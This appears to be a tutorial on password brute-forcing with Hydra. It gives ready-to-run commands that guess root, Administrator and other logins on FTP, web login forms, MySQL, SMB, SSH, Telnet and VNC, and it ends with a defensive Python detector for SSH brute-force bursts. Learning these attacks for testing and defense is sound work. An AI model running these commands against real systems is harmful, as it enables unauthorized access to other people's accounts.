Brute-Force with Hydra

What is brute-force

A brute-force attack is an attempt to crack a password or a username, find a hidden web page, or discover the key used to encrypt a message through trial and error, in the hope that one of the guesses will eventually be correct. It is an old attack method, but it remains popular and effective among hackers.


To follow the examples, you need to know how the Hydra tool works, so here is a short reference to its main options.

-L  Set a wordlist of user names to test.
-l  Set a single user name to test.
-P  Set a wordlist of passwords to test.
-p  Set a single password to test.
-F  Stop the test as soon as a valid combination is found.
-s  Define which port will be tested.
-t  Set the number of tasks (connection attempts) run in parallel (Hydra's default is 16).
-v  Activate verbose mode, which shows everything being tested.
-V  Enable extended verbose mode, which shows each username and password combination tested.

Brute-force in services


FTP

hydra -l <user> -P /usr/share/wordlist/rockyou.txt <IP> ftp

HTTP – Post Form

hydra -l <user> -P /usr/share/wordlist/rockyou.txt < or IP>  http-post-form "/caminho/login.php:name=^USER^&password=^PASS^&enter=Sign+in:error message"


MySQL

hydra -l <usuario> -P /usr/share/wordlist/rockyou.txt <IP> mysql


SMB

hydra -l Administrator -P /usr/share/wordlist/rockyou.txt <IP> smb -t 1


SSH

hydra -l root -P /usr/share/wordlist/rockyou.txt [-t 32] <IP> ssh


Telnet

hydra -l root -P /usr/share/wordlist/rockyou.txt [-t 32] <IP> telnet


VNC

hydra -P /usr/share/wordlist/rockyou.txt -s <PORT> <IP> vnc
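Seen from the defender's side, a wordlist run like the SSH one above shows up in the server's authentication log as a burst of failed logins from one source, sometimes followed by a success. The following is an added example, not part of the original page: it flags that pattern in sshd log lines. The log lines are constructed, and the function name, threshold, window and year are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample sshd log lines (not taken from a real system).
SAMPLE_LOG = """\
Mar 10 09:15:01 web01 sshd[2001]: Failed password for root from 203.0.113.7 port 40001 ssh2
Mar 10 09:15:01 web01 sshd[2002]: Failed password for root from 203.0.113.7 port 40002 ssh2
Mar 10 09:15:02 web01 sshd[2003]: Failed password for root from 203.0.113.7 port 40003 ssh2
Mar 10 09:15:02 web01 sshd[2004]: Failed password for root from 203.0.113.7 port 40004 ssh2
Mar 10 09:15:03 web01 sshd[2005]: Failed password for root from 203.0.113.7 port 40005 ssh2
Mar 10 09:16:40 web01 sshd[2101]: Failed password for alice from 198.51.100.20 port 51000 ssh2
Mar 10 09:17:05 web01 sshd[2102]: Accepted password for alice from 198.51.100.20 port 51001 ssh2
Mar 10 09:17:30 web01 sshd[2006]: Accepted password for root from 203.0.113.7 port 40006 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

def detect_bruteforce(log_text, threshold=5, window_s=60, year=2024):
    """Flag source IPs with >= threshold failed logins inside a sliding window,
    and record the first account that logs in from that IP afterwards."""
    window = timedelta(seconds=window_s)
    recent = defaultdict(deque)  # ip -> timestamps of failures still in the window
    alerts = {}                  # ip -> alert details
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        # Syslog timestamps carry no year, so one is supplied (assumption).
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        ip, user = m["ip"], m["user"]
        if m["result"] == "Failed":
            q = recent[ip]
            q.append(ts)
            while ts - q[0] > window:   # drop failures older than the window
                q.popleft()
            if len(q) >= threshold and ip not in alerts:
                alerts[ip] = {"first_alert": ts, "login_after_alert": None}
        elif ip in alerts and alerts[ip]["login_after_alert"] is None:
            # A success after a flagged burst suggests a guessed password.
            alerts[ip]["login_after_alert"] = user
    return alerts
```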
